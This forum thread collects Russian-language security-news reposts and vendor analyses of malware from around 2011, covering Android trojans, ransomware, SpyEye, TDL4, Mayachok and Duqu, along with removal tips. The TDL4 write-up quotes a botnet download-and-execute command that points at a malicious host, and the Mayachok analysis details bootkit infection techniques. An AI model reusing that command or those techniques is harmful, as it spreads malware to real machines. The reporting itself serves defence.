Сейчас обсуждают

[di_con]

Новый троянец распространяется под Mac OS X

Антивирусная компания Sophos в субботу сообщила об обнаружении нового опасного троянского программного обеспечения под операционную систему Mac OS X. Отметим, что обнаружение новых вирусов и троянцев под Mac OS X - это сравнительно редкое явление и каждый новый образец такого программного обеспечения является предметом пристального внимания пользователей данной операционной системы.

Новый код называется BlackHole RAT (Remote Access Trojan) и сейчас его достаточно легко найти на многих хакерских форумах. Честер Висниевски, антивирусный специалист компании Sophos, говорят, что на YouTube был в субботу размещен ролик, демонстрирующий работу данного троянца (http://www.youtube.com/watch?v=bGaQXOuMRaY...feature=related)

В Sophos говорят, что в их компании не видели данного троянского программного обеспечения в действии, хотя судя по демонстрации, разработка в значительной степени является концептуальной и показывает общий вектор направления развития возможных атак. Также в компании говорят, что его довольно легко можно адаптировать для "тихой" установки в Mac и последующей кражи данных.

Технически говоря, BlackHole - это вариант Windows-троянца darkComet, но судя по коду, он был написан другим разработчиков. darkComet сейчас доступен в исходных кодах, поэтому велика вероятность того, что Mac-троянец просто позаимствовал логику и некоторые аспекты работы первоначального троянца.

Источник

[di_con]

Два вируса атакуют Android

» Спойлер (нажмите, чтобы прочесть) «

Специалисты в области безопасности предупреждают пользователей смартфонов, работающих под управлением операционной системы Android о появлении в сети двух новых опасных вирусов.

Как сообщает компания NetQin Mobile, обнаружившая угрозу, оба вредоноса распространяются под видом приложений через неофициальные ресурсы.

Один из них - SW.SecurePhone - в фоновом режиме контролирует любую активность пользователя. При этом он собирает и сохраняет на SD карте некий «архив» из имеющихся в телефоне данных (сообщения, журналы исходящих и входящих вызовов, звуковые дорожки, изображения и пр.), который каждые 20 минут отправляется на удаленный сервер.

Что касается второго зловреда - SW.Qieting, то в его функции входит коллекционирование хранящихся сообщений и перенаправление их на другой номер.

Причем, отмечают эксперты, оба образца достаточно сложно обнаружить, поскольку они никоим образом себя не выдают. На данный момент, пик активности вирусов зарегистрирован среди пользователей США.

В связи с этим, пользователям настоятельно рекомендуются не прибегать к услугам неофициальных источников, распространяющих популярные приложения для упомянутой платформы. Кроме того, прежде чем устанавливать программу стоит прочитать имеющиеся в сети отзывы, отчеты и получить как можно больше информации о разработчике.

Источник

Обнаружена новая угроза для смартфонов: Android.Pjapps Trojan

» Спойлер (нажмите, чтобы прочесть) «

Новый троян, способен не только зомбировать пораженные Android – устройства, но и снабжен расширенным функционалом, позволяющим злоумышленникам извлекать конфиденциальные данные пользователей, сообщает компания Symantec.

Android.Pjapps был обнаружен в программе Steamy Window, однако, по мнению экспертов, это не единственное приложение, через которое вредонос может попасть в телефон.

Согласно сообщению, помимо основной своей функции – формирование бот-сети, троян может устанавливать дополнительные приложения, отправлять пользователя на вредоносные сайты, устанавливать закладки, отправлять и блокировать текстовые сообщения, а также отправлять конфиденциальные данные (IMEI, идентификационный и серийный номер устройства, ID абонента) на сервер управления, которых, как оказалось, достаточно много.

Как отмечает инженер в области безопасности Symantec Марио Баллано, в случае атаки злоумышленника будет достаточно трудно отследить, поскольку предусмотренная схема позволяет скрыть следы в "облаке". То есть, после установки, зловред незаметно для пользователя регистрирует все свои службы. Причем активируется он после того, как изменится уровень сигнала устройства. Далее происходит следующее: зловред незаметно собирает упомянутую информацию о телефоне и владельце и отправляет на один из своих серверов. Получив ответ, пересылает IMEI телефона по ссылке, в которой забит "премиум" номер владельца.

Важно отметить, что на текущий момент указанные в коде программы URL не активны. Однако принимая во внимание возможности этого образца, г-н Баллано предполагает, что программа была создана с целью проведения рекламных кампаний, а также получения прибыли со скомпрометированных телефонов.

Источник

[di_con]

Программа для взлома контакта по ID - троянец-вымогатель Trojan-Ransom.Win32.Vkont.a

«Лаборатория Касперского» обнаружила новый троянец-вымогатель Trojan-Ransom.Win32.Vkont.a. Распространяется он с сайта, на котором предлагается скачать «Программу для взлома контакта по ID»

» Спойлер (нажмите, чтобы прочесть) «

Оформление страницы, на которой предлагается скачать программу, якобы позволяющую читать чужие сообщения, напоминает главную страницу сайта «ВКонтакте».

Фрагмент сайта, с которого распространяется вымогатель

Когда зловред запускается на компьютере пользователя, на экране появляется окно с предложением купить программу “VKontakte-HACK”. В качестве подарка к этой программе прилагаются: «Программа для получения пароля к электронному ящику», «Программа для составления персонального гороскопа», «Программа для подбора причёски». В общем, набор опций для любопытных пользователей.

Окно с навязчивым предложением закрыть нельзя, чтобы от него избавиться, пользователь должен отправить SMS на премиум-номер. Что интересно, этот троянец отличается от своих сородичей тем, что позиционирует блокирующее окно как «рекламную заставку».

Окно, которое открывает Trojan-Ransom.Win32.Vkont.a

Сервис «Deblocker», предоставляемый «Лабораторией Касперского», позволяет сгенерировать код, который троянец ожидает в поле ввода. Если ввести корректный «пароль», то зловред разблокирует компьютер и скачает архив VK-Hack.zip. В этом архиве содержится пять папок: «Взлом Вконтакте», «Взлом электронной почты», «Персональный гороскоп», «Подбор прически» и «Тест на сексуальность».

Источник

[di_con]

Под видом обновления для Android скрывается троян

» Спойлер (нажмите, чтобы прочесть) «

Вирусописатели создали троян, замаскированный под программную утилиту, предназначенную для избавления пострадавших пользователей от угрозы, обнаруженной на Android Market.

Напомним, что в результате этой "акции" скомпрометировано было более 50000 телефонов.

В ответ компания Google удалила зараженные программы с сайта, тем самым остановив дальнейшее распространение заразы, но, к сожалению, излечить устройства не удалось. Поэтому было принято решение о создании утилиты, которая могла бы помочь пользователям удалить угрозу - Android Market Security Tool.

Однако не успело обновление появиться в сети, как хакер, известный как VXers разработал прототип этой программы - Bgserv-A. Согласно данным специалистов в области безопасности, сначала вредонос отправляет IMEI и номер пораженного телефона на удаленный сервер и получив в ответ инструкции с контрольного пункта, отправляет на премиум номер SMS сообщение с конфиденциальными данными пользователя. Заметим, что троян поставляется в виде легитимного обновления, но распространяется через неофициальные ресурсы. В настоящий момент угрозе подвержены жители Китая, поскольку в коде программы указан номер китайского мобильного оператора.

Кроме того, эксперты отметили интересную особенность вредоноса. Дело в том, что код трояна создан на основе проекта, который был размещен на сервисе, предназначенном для разработчкиков программного обеспечения - Google Code, а лицензирована программа была Apache License.

Источник

[di_con]

Trend Micro предупреждает о Linux-вирусе, атакующем маршрутизаторы

» Спойлер (нажмите, чтобы прочесть) «

Специалисты компании обнаружили вредоносное программное обеспечение для платформ Linux/UNIX, которое способно предпринимать атаки против административных интерфейсов некоторого сетевого оборудования - в частности, роутеров D-Link.


Угроза получила наименование ELF_TSUNAMI.R. Сообщается, что сущностно данная инфекция представляет собой IRC-бэкдор. Логически это файл формата ELF, который может быть доставлен на компьютер пользователя вредоносной начинкой веб-сайта или другим вирусом (к примеру, троянским контейнером). После установки в систему программа пытается соединиться с удаленными серверами и подключиться к некоторым IRC-каналам для получения инструкций.

Бэкдор способен обработать порядка двух десятков различных команд, среди которых, например, "приказы" на генерацию мусорного трафика. В частности, у него есть функция "TSUNAMI", инициирующая DDoS-нападение на определенную цель с заданным интервалом отправки пакетов. Кроме того, возможности вредоносной программы позволяют удаленному оператору атаковать маршрутизаторы: в арсенале бэкдора имеется механизм подбора учетных данных к административным интерфейсам этих устройств методом грубой силы.

Любопытно, что вирус не пользуется каким-либо заданным списком сочетаний "логин-пароль" - во всяком случае, аналитики Trend Micro такого списка не нашли. Судя по описанию, он умеет лишь проверять наличие стандартных (т.е. заводских) аутентификационных сведений или получать комбинации для проверки от оператора посредством специальной команды.

Еще одной особенностью бэкдора является его способность эксплуатировать уязвимость в программном обеспечении маршрутизаторов D-Link. Изъян, о котором идет речь, позволяет в случае его успешной эксплуатации сбросить параметры конфигурации устройства к установленным по умолчанию значениям. Этот механизм, очевидно, работает в связке с подсистемой подбора пароля: ведь аннулирование настроек устанавливает и стандартные учетные сведения для входа в панель администрирования маршрутизатора.

В настоящее время антивирусные эксперты компании выясняют, может ли бэкдор атаковать не только оборудование D-Link, но и сетевые устройства других производителей. Наибольшая активность вредоносной программы отмечена в Латинской Америке, но ее распространение возможно и в других регионах.

Источник

[di_con]

Ботмастера SpyEye пытались саботировать работу Abuse.ch

» Спойлер (нажмите, чтобы прочесть) «

Исследователи в области безопасности RSA FraudAction Research Lab сообщают о появлении новой версии трояна SpyEye, которая теперь снабжена плагином, позволяющим проведение DDoS атак. Первым целевым ресурсом стал abuse.ch.

Как известно, этот веб-сайт был создан швейцарскими специалистами в области безопасности несколько лет назад с целью мониторинга активности опасных банковских тоянов ZeuS, SpyEye и Palevo, а также отслеживания появления их новых контрольных серверов и зараженных сайтов. Сервисом активно пользовались многие интернет – провайдеры и компании для того, чтобы обезопасить своих пользователей от посещения вредоносных ресурсов. Кроме этого сервис позволяет блокировать подозрительные IP адреса или домены и, таким образом, нарушить связь между зараженной машиной и контрольным пунктом бота.

Естественно, это вызывало негодование злоумышленников, которые с помощью упомянутых программ кропотливо создавали свои сети.

По словам независимого журналиста Брайана Кребса, на соответствующих форумах хакеры искали метод нейтрализовать мешающий им сервис. Некоторые участники даже предложили физическую расправу над создателем ресурса. Однако был выбран иной путь. Они решили устроить DDoS атаку, а инструментом для ее проведения был выбран SpyEye. Причем такой выбор был сделан не случайно, ведь последние версии трояна поддерживают возможность расширения функционала путем добавления новых модулей при сборке.

Так появилась последняя версия бота. Причем, стоит отметить, что разработчики подошли к задаче основательно, предоставив возможность выбора между типом атак: SYN Flood, UDP Flood и Slowloris Flood. Кроме этого, они включили в файл конфигурации трояна легитимные сайты, в числе которых оказались google.com, myspace.com и vkontakte.ru, дабы усложнить детектирования вредоносных ресурсов. Это означает, что все собранные данные, включая скриншоты, логины и пароли пользователей, сертификаты и cookies будут отправляться как на контрольные серверы, так и на указанные адреса законных сайтов.

Таким образом, замысел хакеров очевиден. Как предполагают эксперты, при попытке воспользоваться ресурсом abuse.ch пользователи будут введены в заблуждение, поскольку он будет идентифицировать легитимные домены как вредоносные и, наоборот, в результате чего сервис потеряет доверие, а эффективность обнаружения снизится.

Источник

[di_con]

Платежные терминалы под атакой троянца

» Спойлер (нажмите, чтобы прочесть) «

16 марта 2011 года

Компания «Доктор Веб» – российский разработчик средств информационной безопасности – сообщает об обнаружении троянца Trojan.PWS.OSMP, заражающего терминалы одной из крупнейших российских платежных систем. Эта вредоносная программа вмешивается в работу легального процесса maratl.exe, запущенного в операционной системе терминала, и подменяет номер счета, на который осуществляет платеж пользователь. Таким образом, деньги попадают напрямую к злоумышленникам.

Первоначально в операционную систему платежного терминала (ОС Windows) попадает BackDoor.Pushnik, представляющий собой вредоносную программу в виде исполняемого файла, написанного злоумышленниками на языке Delphi. Передается он через съемные носители, в частности USB Flash Drive. Как только такая «флешка» подключается к терминалу, происходит автозапуск бэкдора. В дальнейшем BackDoor.Pushnik получает с сервера первого уровня конфигурационную информацию, в которой присутствует адрес управляющего сервера второго уровня. С него, в свою очередь, исходит «задача» загрузить исполняемый файл (троянскую программу Trojan.PWS.OSMP) с третьего сервера.

Trojan.PWS.OSMP – одна из первых вредоносных программ, представляющих опасность для клиентов платежных терминалов. Попадая в операционную систему, троянец проверяет программное обеспечение, установленное на терминале и осуществляет поиск процесса maratl.exe, который является вполне легальной программой. Далее Trojan.PWS.OSMP встраивается в maratl.exe, меняя его память. В сущности, троянская программа позволяет злоумышленникам исправить любой номер счета, на который пользователи отправляют деньги. Средства, таким образом, попадают напрямую вирусописателям.

Последняя известная модификация Trojan.PWS.OSMP, появившаяся в конце февраля 2011 года, действует уже по другой схеме. Она крадет конфигурационный файл, что, предположительно, может помочь злоумышленникам создать поддельный терминал на обыкновенном компьютере и направлять деньги на собственный счет в электронной форме, минуя купюроприемник.

Сейчас можно с уверенностью говорить, что Trojan.PWS.OSMP представляет наибольшую опасность для терминалов, подключенных к Интернету и использующих maratl.exe. Специалисты «Доктор Веб» уже передали всю известную им информацию компании — владельцу терминалов, которые находятся под угрозой. Надеемся, что это поможет решить проблему в кратчайшие сроки и уберечь пользователей от потери денежных средств.

По оценкам специалистов из процессинговой компании вероятность заражения терминалов этим троянцем является невысокой ввиду специфики обслуживания. По их словам, активность Trojan.PWS.OSMP на данный момент

Источник

[SanchoZZ]

Ботнет TDL4 сдаётся в аренду?

» Спойлер (нажмите, чтобы прочесть) «

Не так давно нами была замечена интересная особенность в некоторых новых сэмплах руткита TDL4 (Win32/Olmarik.AOV). Если кто не в курсе, данному руткиту удаётся удерживать звание самой технологичной массовой вредоносной программы вот уже на протяжении нескольких лет. Это первый полноценный руткит для x64, которому удалось в обход проверки цифровой подписи и PatchGuard пробраться в ядро на 64-битных системах.

Дело в том, что после своей успешной установки, некоторые экземпляры этого руткита устанавливают в систему троянцев из семейства Win32/Glupteba. Это наводит на мысли о том, что ресурсы данного ботнета начали сдавать в аренду. Так же интересно, что нет дальнейшего взаимодействия между ботами Win32/Glupteba и TDL4.

Итак, сразу после успешной установки и идентификации бот TDL4 получает следующую команду из С&C:

task_id = 2|10||h**p://wheelcars.ru/no.exe

Интерпретировать которую можно следующим образом:

task_id = [command_id] [encryption_key] [URL]

В нашем случае набор параметров совпадает с командой «DownloadAndExecute», потому что ключ шифрования равен нулю, а идентификатор команды равен 2 и затем следует количество попыток ее выполнение, равное десяти.

После установки в систему Win32/Glupteba получает задание уже из своего C&C и начинает его выполнение.


Чаще всего бот получает два типа заданий: первый – это скликивание контекстной рекламы из рекламной сети «Бегун», а второе — рассылка спама. Давайте по подробнее рассмотрим, что же делает этот бот.

В первом случае происходит посещение большого количества сформированных специальном образом веб-страниц, наполнение которых провоцирует появление определенного типа контекстных объявлений. Причем все веб-страницы, с которых происходит скликивание, расположены на серверах провайдера Masterhost.


Если посмотреть на статистику сетевых обращений скликивающего бота, то она выглядит следующим образом:


Сам ботнет TDL4, как и его предшественник, так же активно монетизируется через «черные» методы продвижения веб-сайтов и подмену результатов поиска в популярных поисковых системах.

Оригинал

[di_con]

SpyEye атакует смартфоны

» Спойлер (нажмите, чтобы прочесть) «

По свидетельству экспертов из F-Secure, новый MitMo-троянец представляет собой компонент шпионской программы SpyEye.

Новый мобильный зловред атакует устройства на базе Symbian и ориентирован на кражу кодов mTAN, которые используются для аутентификации в системах онлайн-банкинга. Чтобы прописаться на зараженном смартфоне, он использует сертификат, выданный китайским веб-сайтом cer.opda.cn, который позволяет подписывать приложения при установке на конкретное устройство. Троянец также пытается заполучить у потенциальной жертвы международный идентификатор IMEI: перехватывает сеанс связи с системой онлайн-банкинга и на лету внедряет в страницу регистрации дополнительное поле для заполнения. В случае успеха вредоносный файл добавляется к списку разрешенных (подписанных) приложений на данном устройстве.

По всей видимости, авторы новой версии MitMo-троянца воспользовались доступностью сертификатов OPDA. Их можно получить бесплатно на сайте cer.opda.cn, для оформления заказа требуется лишь зарегистрироваться и ввести в специальную форму IMEI. Правда, в целях борьбы с злоупотреблениями с недавних пор порядок выдачи сертификатов на сайте изменился: сертификат выдается бесплатно лишь при первичном обращении, остальные приходится оплачивать. Однако не стоит забывать, что OPDA — не единственная организация, предоставляющая такие услуги.

Примечательно, что вирусописатели взяли за основу своего нового творения SpyEye. Все предыдущие MitMo-атаки ― в сентябре прошлого года, в феврале нынешнего ― проводились с использованием облегченных модификаций ZeuS.

Источник

[Feo]

Rootkit.Boot.Cidox —новое семейство и все тот же надоедливый баннер

Новая эпидемия, разрослась буквально за 3-4 дня. Баннер, когда-то причинивший пользователям не мало хлопот по его удалению. Естественно, вирусописатели не стоят на месте, а продолжают модифицировать свое детище.
На сей раз, мы видим все тот же баннер с информацией, якобы об установке обновлений и нежелательном использовании интернета.

На первый взгляд ничего особенного, лечится простым удалением библиотеки dll. Но...если было бы все так просто! У некоторых пользователей после удаления этой самой зловредной библиотеки, баннер продолжал находиться в системе. Логи лечащих утилит показывают, что в системе все чисто. Даже зацепиться не за что. Естественно, пришлось применять различные методики обнаружения нового зловреда и того, что мешает нормальной работе браузеров (надоедливое "обновление", отображение исходного кода страницы). Путем работы нескольких людей (коллег), было предложено снять несколько слепков (копий, сделать карантин) загрузочной записи жесткого диска (MBR). В итоге, вроде-бы все чисто, но были обнаружены компоненты новой зловредной программы, но не само тело. По-видимому, тело само скрыто и защищается от обнаружения. Найдено и расшифровано ли тело до сих пор, сказать не могу, но то, что удалось обнаружить новое семейство вирусов Rootkit.Boot.Cidox и отчасти понять общий принцип работы, и даже занести в сигнатуры — это уже хорошо. А лечится он с помощью перезаписи бут-сектора жесткого диска с консоли восстановления системы. Более подробный ход лечения и рекомендации, можно найти ниже. Думаю позже, уже будут подробные публикации, а пока так, все из первых рук для ознакомления
Соответственно, если Вы обнаружили у себя подобный баннер, обращайтесь — обязательно поможем


Тема с недавним лечением http://forum.sibnet.ru/index.php?showtopic=1007866
Способ перезаписи бут-сектора для XP — http://forum.sibnet.ru/index.php?s=&sh...t&p=9866262
Способ перезаписи бут-сектора для Win 7 и Vista — http://forum.sibnet.ru/index.php?s=&sh...t&p=9866443

Автор: Feo

UPD. На данный момент добавила сигнатуру ЛК, поэтому, может лечиться AVPTool (Kaspersky Virus Removal Tool) ( http://support.kaspersky.ru/avptool2010/all?qid=208637134 )
UPD. Так же TDSSKiller ( http://support.kaspersky.ru/faq/?qid=208639606 )

Сообщение отредактировал Feo - 30.6.2011, 17:57

[Feo]

Новый руткит Popureb делает Windows неработоспособной

Microsoft накануне предупредила пользователей Windows о том, что им придется переустанавливать операционную систему, если их компьютер будет инфицирован новым руткитом, который скрывает от операционной системы главный загрузочный сектор. Речь идет о новом варианте троянца Popureb, который так глубоко размещается в системе, что единственная возможность полностью восстановить систему - это переустановить Windows или воспользоваться диском восстановления.

"Если ваша система была инфицирована Trojan:Win32/Popureb.E, мы советуем вам восстановить MBR при помощи CD восстановления, возвращающего систему к заводским настройкам", - говорит Чан Фенг, инженер Microsoft Windows Protection Center.

Вредоносное ПО Popureb перезаписывает загрузочный сектор - место жесткого диска, которое операционная система начинает считывать в первую очередь после того, как получает управление от BIOS. Popureb отлавливает операции записи, ориентированные на MBR, после чего размещает там свой код. Троянец имитирует часть системных функций операционной системы и размещается в бут-секторе, оставаясь невидимым как для операционной системы, так и для антивирусного ПО, передает cybersecurity.

Сейчас на сайте Windows Protection Center размещены инструкции по восстановлению MBR для операционных систем XP, Vista и Windows 7.

Фенг говорит, что в основном троянцы подобного рода размещаются в системе для последующего заражения систем другими образцами вредоносного ПО. В начале 2010 года был зафиксирован троянский код Alureon, направленный на Windows XP и делающей ОС неработоспособной после установки апдейтом из Windows Update.

Источник

[Feo]

Trojan.Mayachok.2: анализ первого известного VBR-буткита

В процессе изучения статистики появившихся за последнее время угроз складывается впечатление, что модификация загрузочной записи в процессе инфицирования — новое модное веяние среди разработчиков вредоносного ПО. Особое место среди подобных программ занимает троянец Trojan.Mayachok.2, инфицирующий Volume Boot Record и нарушающий работу популярных браузеров.

Заражение системы

Перед началом атаки на инфицируемый компьютер дроппер вредоносной программы проверяет зараженность системы. Для этого на основе серийного номера системного раздела генерируется CLSID и проверяется его наличие в системном реестре: если в ветке HKLM\Software\Classes\CLSID отсутствует соответствующий раздел, то заражение продолжается.

В операционных системах Windows Vista и Windows 7 троянец пытается повысить собственные права. Этот весьма примитивный способ уже не раз использовался другими вредоносными программами: постоянный перезапуск самой себя с запросом на повышение привилегий. Опытный пользователь с легкостью может завершить такой назойливый процесс в «Диспетчере задач».

Дроппер несет в себе как 32-битный, так и 64-битный драйвер, в будущем способный обеспечить загрузку основного функционала данной вредоносной программы. На диске сохраняется соответствующий драйвер в зависимости от разрядности пользовательской операционной системы. Он может быть записан как в начало диска (до первого активного раздела), если там достаточно места, так и в его конец. Несложно заметить, что в логике троянца присутствует ошибка: так, например, если загрузочным разделом окажется не первый, то троянский драйвер может перезаписать случайные данные любого раздела до загрузочного, т. к. позиция для записи выбирается случайно в пределах свободных (как считает троянец) секторов.

Только после этого начинается заражение VBR (Volume Boot Record). Вредоносная программа отказывается от заражения, если файловая система раздела имеет формат, отличный от NTFS. Анализируя загрузочную запись, троянец находит удобное место для своего размещения и перезаписывает имеющийся там код. Оригинальный код упаковывается при помощи библиотеки aplib (http://www.ibsensoftware.com) и дописывается следом за вирусным. Номер начального сектора размещенного ранее на диске драйвера и его размер также «прошиваются» в тело зараженной VBR.

Здесь следует еще раз сказать о необычности механизма заражения. Вирусы, модифицирующие MBR (Master Boot Record) и BOOT-секторы, известны еще со времен DOS, в то время как современные ОС предоставляют новые возможности, в том числе и для вирусописателей. В рассматриваемом нами случае BOOT-сектор является первым сектором VBR, который, например, для раздела NTFS занимает 16 секторов. Таким образом, классическая проверка только загрузочного сектора не может обнаружить вредоносный объект, т. к. он располагается дальше — внутри VBR.

После заражения системы Trojan.Mayachok.2 сбрасывает на диск небольшое приложение, предназначенное для автоматической перезагрузки системы. Стоит отметить, что аналогичным образом ведет себя и другой буткит — Trojan.Hashish. В завершение своей работы троянец пытается «замести следы» и удалить себя.

Запуск из VBR

Сравнение первых секторов VBR чистой и зараженной системы, красным показаны различия — код вирусного загрузчика

Получив управление, вирусный загрузчик действует по классической для MBR/BOOT-вирусов схеме. «Откусывает» себе небольшой кусок системной памяти, переносит себя туда и перехватывает прерывание int 13h для просмотра содержимого считываемых с диска секторов. Затем он целиком загружает с диска свой драйвер и распаковывает на прежнее место оригинальный код VBR. Управление возвращается системному загрузчику.

Далее идет череда снятий/установок перехватов в загружаемых модулях, таких как ntldr, bootmgr, osloader.exe, winload.exe и т. д., в зависимости от используемого операционной системой загрузчика. Следует отметить, что помимо обычных перехватов (сплайсинга) в ключевых мостах используются аппаратные отладочные регистры (dr0-dr7) и трассировка (пошаговое исполнение) кода. Это придает универсальность троянцу и одновременно является естественным способом обхода защиты целостности некоторых загрузочных модулей. В итоге в области памяти режима ядра (kernelmode memory) оказывается загруженный и готовый к работе вирусный драйвер.

Драйвер загрузчика
Точка выхода вирусного драйвера вызывается дважды. Это связано с тесной работой зараженного VBR и драйвера. Поскольку код вирусного VBR составляет всего 2078 байт, часть функционала авторы решили перенести в тело драйвера. При первом вызове он добавляет себя в списки из LOADER_PARAMETER_BLOCK: в LoadOrderList как копия первого модуля в списке (а это ядро ОС) и в BootDriverList как загрузочный драйвер, якобы прописанный в \Registry\Machine\System\CurrentControlSet\Services\null. Таким образом, вредоносная программа имитирует свою загрузку в качестве обычного boot-драйвера.

Второй раз драйвер вызывается операционной системой, которая уверена, что сама загрузила его. Данные манипуляции приводят к некоторым побочным эффектам.

Например, в системе появляется драйвер Null, но при более внимательном рассмотрении оказывается, что он был создан ядром (ntoskrnl.exe).

В то же время среди загруженных модулей есть еще одно «ядро», в котором параметры DllBase и SizeOfImage принадлежат вредоносному драйверу.

В качестве экспресс-проверки системы на наличие или отсутствие заражения можно использовать простую команду «echo hello >nul», которая на неинфицированной системе успешно выполняется, а на зараженной выдает сообщение об ошибке.

Задачей драйвера является инжект (внедерение) своего кода в запущенные процессы.

64-битный драйвер, красным выделены динамические библиотеки, которые упакованы aplib

Внедрение кода осуществляется обычной установкой нотификаций через функции PsCreateProcessNotifyRoutine и PsCreateProcessNotifyRoutine с последующим вызовом асинхронной функции через механизм APC. В процессе исследования выяснилось, что 64-битный драйвер несет «на борту» две библиотеки. При этом полезная нагрузка находится только в одной из них, а вторая, по всей видимости, является «заделом на будущее».

32-битный драйвер, который осуществляет заброс шелл-кода в процессы

В остальном же драйвер не представляет особого интереса. На сегодняшний день используемый Trojan.Mayachok.2 механизм заражения является уникальным среди известных угроз. Специалисты компании «Доктор Веб» предполагают, что в недалеком будущем стоит ожидать использования подобной техники заражения другими вредоносными программами.

Источник

[RolikJorik]

Троян TrojanDropper:Win32/Vundo.L интересный образец вредоносного файла (хешсумма SHA1:fbe71968d4c5399c2906b56d9feadf19a35beb97, определяется как троян, специально разработанного хакерами для кражи учетных данных пользователей таких социальных сетей как Вконтакте.ру и перенаправляющая посетителей на 92.38.209.252, но весьма необычным способом. Подробнее по ссылке..

Вирус, использующий ресурсы графического процессора эксперты Symantec поймали в свои сети образец "живого" вируса, эксплуатирующего ресурсы ГП для атак на криптографические алгоритмы.

Сообщение отредактировал RolikJorik - 17.8.2011, 22:48

[RolikJorik]

Новый сетевой червь распространяется через протокол Windows RDP

[RolikJorik]

Зафиксирован новый способ мошенничества на «установке» и «активации» платных «обновлений» возможно вирус и старый, но способ новый. а на новый способ и новый вирь отыщется.

G Data обнаружила новый троян для активации Windows - Лаборатория G Data Software определяет эту программу-вымогателя, как Trojan.Generic.KDV.340157 (Engine A) and Win32:Trojan-gen (Engine B ) код разблокировки: QRT5T5FJQE53BGXT9HHJW53YT предоставлен Panda Согласно сообщению аналитиков Panda, этот образец пока распространяется среди германоговорящих пользователей сети, при помощи спам- рассылок или через P2P сети.

Trojan.Bioskit.1 заражает BIOS компьютера - После проведенного специалистами «Доктор Веб» исследования оказалось, что в него также заложены механизмы, позволяющие заразить BIOS материнской платы компьютера.

Файлы *.txt представляют опасность в Windows

Сообщение отредактировал RolikJorik - 18.9.2011, 0:52

[RolikJorik]

Symantec сообщила о появлении новой угрозы Duqu - По результатам анализа кода нового трояна, специалисты Symantec выявили поразительное сходство с кодом Stuxnet. Основной целью Duqu являются разведданные об имеющемся на предприятии оборудовании и системах, используемых для управления производственным циклом. Это может быть любая информация, которая будет полезна для организации нападения, начиная от простых служебных и заканчивая классифицированными конструкторскими документами: файлы, в том числе на съемных носителях; скриншоты; логи с клавиатуры; список запущенных процессов; данные учетных записей пользователей; названия открытых окон; сетевая информация; сведения о домене; имена дисков и др.

[Feo]

Компания Symantec сообщила о крупнейшей вирусной атаке на пользователей Android.

Новый вредоносный код под названием Android.Counterclank был размещен в онлайн-магазине Android Market в 13 различных приложениях. Многие из них до сих пор остаются там.

Android.Counterclank представляет собой "троян", который собирает пользовательскую информацию, вплоть до технических данных производителя устройства. Также приложение начинает отображать рекламные сообщения и баннеры на смартфоне.

«Есть ряд признаков, по которым можно опознать наличие троянца. Например, у вас может возникнуть вопрос, почему приложение запрашивает данные на модификацию настроек браузера или передачу GPS-координат. Впрочем, у большинства пользователей не возникает таких вопросов», - сообщает один из сотрудников компании.

Список зараженных Android.Counterclank приложений:

» Спойлер (нажмите, чтобы прочесть) «

-Counter Elite Force
-Counter Strike Ground Force
-CounterStrike Hit Enemy
-Heart Live Wallpaper
-Hit Counter Terrorist
-Stripper Touch girl
-Balloon Game
-Deal & Be Millionaire
-Wild Man
-Pretty women lingerie puzzle
-Sexy Girls Photo Game
-Sexy Girls Puzzle
-Sexy Women Puzzle